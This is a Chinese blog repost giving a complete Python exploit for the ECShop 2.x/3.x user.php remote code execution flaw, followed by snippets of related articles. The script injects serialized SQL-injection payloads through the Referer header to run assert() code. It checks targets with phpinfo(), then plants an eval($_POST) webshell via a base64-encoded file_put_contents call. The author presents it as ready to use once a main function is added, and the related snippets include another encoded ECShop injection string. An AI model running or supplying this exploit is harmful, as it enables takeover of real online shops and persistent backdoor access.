ecshop v2 v3 EXP

最新推荐文章于 2021-03-11 14:46:28 发布
最新推荐文章于 2021-03-11 14:46:28 发布
阅读量142 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php shell
原文链接:http://www.cnblogs.com/Spec/p/11017846.html
本文提供了一种利用Ecshop V2.x和V3.x版本中存在漏洞的方法,通过构造特定的payload,可以实现远程代码执行,包括获取系统信息和植入webshell。详细介绍了payload的生成过程及验证方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

import requests
import binascii

def get_v2Payload(code):
	'''Ecshop V2.x payload'''
	code = "{$abc'];@assert(%s);//}" %(code)
#	print(code)
	code = code.encode()
	shellcode = binascii.hexlify(code).decode()
	payload = "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}554fcae493e564ee0dc75bdf2ebf94ca" % ((50 + len(shellcode)),shellcode)
	return payload
def get_v3Payload(code):
	'''Ecshop V3.x payload'''
	code = "{$abc'];assert(%s);//}" %(code)
	code = code.encode()
	shellcode = binascii.hexlify(code).decode()
	payload = "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}45ea207d7a2b68c49582d2d22adf953a" % ((50 + len(shellcode)),shellcode)
	return payload
def verify(url):
	print(url)
	flag = "allow_url_include"
	code = "phpinfo()"
	url = url + "/user.php"
	ec2payload = get_v2Payload(code)
#	print(ec2payload)
	ec3payload = get_v3Payload(code)
	payloads = [(ec2payload,'2.x'),(ec3payload,'3.x')]
	for payload,version in payloads:
		headers = {
			'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
			'Referer':payload
		}
		try:
			rsp = requests.get(url,headers=headers,timeout=3)
			if flag in rsp.text:
				verifyInfo = {}
				verifyInfo['URL'] = url
				verifyInfo['version'] = version
				print(verifyInfo)
				break
		except:
			pass
def getshell(url):
	code = "base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3NoZWxsLnBocCcsJzw/cGhwIGV2YWwoJF9QT1NUWzc3N10pOyA/Picp')"
	i = url + "/user.php"
	ec2payload = get_v2Payload(code)
#	print(ec2payload)
	ec3payload = get_v3Payload(code)
	payloads = [(ec2payload,'2.x'),(ec3payload,'3.x')]
	for payload,version in payloads:
		headers = {
			'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
			'Referer':payload
		}
		try:
			rsp = requests.get(i,headers=headers,timeout=5)
			if rsp.status_code == 200:
				shurl = url + "/shell.php"
				srsp = requests.get(shurl,timeout=5)
				if srsp.status_code == 200:
					verifyInfo = {}
					verifyInfo['URL'] = shurl
					verifyInfo['version'] = version
					print(verifyInfo)
					break
		except:
			pass

 大概就是这么个样子,具体要怎么用自己在添加主函数就行。

转载于:https://www.cnblogs.com/Spec/p/11017846.html

ecshop漏洞复现分析
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-17 1515
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 ecshop漏洞复现分析我看seebug上关于它的漏洞有好多。 xianzhi-2017-02-82239600(SQL注入/远程代码执行) 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了
ECSHOP最新ODAY EXP工具
05-10
对中文ECSHOP可以支持13年以前的所有版本。如果更新的就没有办法。
python学习之ecshop exp编写
cxk
06-04 560
python学习之ecshop exp编写 针对ecshop 2.x,漏洞分析请查看网上分析,不再赘述。 # -*- coding:utf-8 -*- import requests import time def ecshop(url): time.sleep(5) url_exp=url+"/user.php" a = "554fcae493e564ee0dc7...
ecshop 解密index.php,ECSHOP 搜索注入漏洞利用exp及后台拿shell
weixin_31100517的博客
03-11 217
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
ECShop 2 3 全系列版本远程代码执行高危漏洞EXP
赵一舟的博客
09-04 578
分析原文:ECShop全系列版本远程代码执行 ECSHOP RCE :VULNSPY实验-ECShop <= 2.7.x 全系列版本远程代码执行 复现地址:https://www.vsplate.com/?github=vulnspy/ECShop_2.7.3_UTF8_installed&autogo=1 sql原型,基于order by limit后的注入: SELECT ...
ecshop几个价格
weixin_34358092的博客
08-17 152
市场售价 market_price   {$goods.market_price} 本店售价 shop_price    {$goods.shop_price} 促销价 promote_price  {$goods.promote_price}
ecshop微信支付v3版整理
08-18
微信支付V3版则是ECShop中集成的微信支付接口,它允许商家在ECShop平台上接受来自微信用户的在线支付。微信支付作为腾讯公司推出的移动支付解决方案,以其便捷性和广泛的用户基础,成为了电商网站不可或缺的支付方式...
ecshop微信支付v3版PC/MOBILE完整版
08-25
"ecshop微信支付v3版PC/MOBILE完整版"意味着这个压缩包包含了适用于PC端和移动端的ECSHOP系统与微信支付的集成版本,版本号为V3。微信支付是腾讯公司推出的在线支付服务,方便用户在各种应用场景下进行快速、安全的...
ecshop微信支付v3版pc和手机端完整版亲测可用
01-10
本人因开了一个网上商城,为了支持微信支付找了很久ecshop微信支付插件,但可能因为ecshop正慢慢被人放弃,网上的插件都不是直接可用,而是有各种各样的问题。弄了很久,在一些朋友的帮助下终于解决了这个问题。这是...
ecshop米奇网商城 ECTouch手机版+微信通V2+微支付
06-10
ecshop米奇网商城 ECTouch手机版+微信通V2+微支付
Ecshop商品详情页显示当前会员等级价格
weixin_33728268的博客
08-08 139
会员登录状态下,在ECSHOP商品详情页的本店售价中显示当前登录会员对应的等级价格,在未登录状态下,则还默认显示原来的本店售价。 解决方法: 这个需要修改ECSHOP程序代码来实现。   打开文件 /includes/lib_goods.php 将 $row['shop_price_formated'] = price_format($row['shop_price']); 修改为...
Ecshop支付宝插件SQL注入及漏洞利用(exp)
热门推荐
Exploit的小站~
05-10 3万+
 0x00 在\includes\modules\payment\alipay.php文件中,有一个response函数用来处理支付信息,在ECSHOP的init初始化文件中,默认是做了全局转义的,而这个漏洞的精髓在于绕过全局转义。 在$order_sn=str_replace($_GET['subject'],'',$_GET['out_trade_no']);中...
ECSHOP 搜索注入漏洞利用exp及后台拿shell
weixin_33906657的博客
01-21 313
这个是search.php exp 变种 search.php? encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXC...
ECShop全系列版本远程代码执行高危漏洞复现
a1b2c3是弱口令
09-03 8683
预警 2018年9月1日,阿里云态势感知发布预警,近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势,该漏洞可直接导致网站服务器沦陷,黑客可通过WEB攻击直接获得服务器权限,利用简单且危害较大。因此,阿里云安全专家提醒ECShop系统用户及时进行修复。 早在1个月前阿里云态势感知就捕获到利用ECShop远程代码执行漏洞进行攻击的真实案例,由于当时该漏洞被利用进行攻击的量...
我的ECshop二次开发从零开始
weixin_30687811的博客
07-25 327
  我是一个EC新手,EC就算做再多的模板,肯定也满足不了我们的需要,更何况各行有各行的门道,EC统一做出来的模板也不一定合适于我们这个行业用,因此,只有我们真正掌握了自己做模板,修改模板的功夫,才能真正的打造适合自己的电子商务平台,真正打造符合自己行业内的客户习惯的电子商务平台。   首先欢迎各位浏览本教程,恭喜大家使用ECshop,!EC有多好,ECshopPHP构建的,PHP的应用...
ECSHOP 如何将商品价格的样式修改掉或者是price_format函数修改
yiyue3139602783的博客
04-08 2692
例如:{$goods.market_price} 找到includes\lib_common.php里price_format函数,修改如下 function price_format($price, $change_price = true) {     /*.............. *****/ return sprintf($GLOBALS['_CFG']['cu
ecshop常用修改
彦彦专栏
11-15 2万+
1:如何修改网站"欢迎光临本店" 回答:languages\zh_cn\common.php文件中, $_LANG['welcome'] = '欢迎光临本店';将他修改成你需要的字样。 还有member_info.lbi里面的welcome字样。 2:如何修改首页"热门搜索关键字" 回答:后台->系统设置->网店设置->显示设置->首页搜索关键字,修改他的内容,然后保存 3:如何
ecshop商城添加“金额+积分”的兑换功能
weixin_34217773的博客
08-04 686
2019独角兽企业重金招聘Python工程师标准>>> ...
ECSHOP 搜索变种暴用户密码出错的解决办法
收集盒 Book box
08-14 639
遇到一个ECSHOP 利用网上的EXP search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWx
ECSHOP 13年前版本0DAY EXP工具详解
根据提供的信息,我们将详细探讨“ECSHOP最新ODAY EXP工具”相关的知识点。 ### 知识点一:ECSHOP概述 ECSHOP是一款开源的电子商务平台,由ShopEx开发,主要用于企业及个人建立线上商店。其功能包括产品管理、订单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值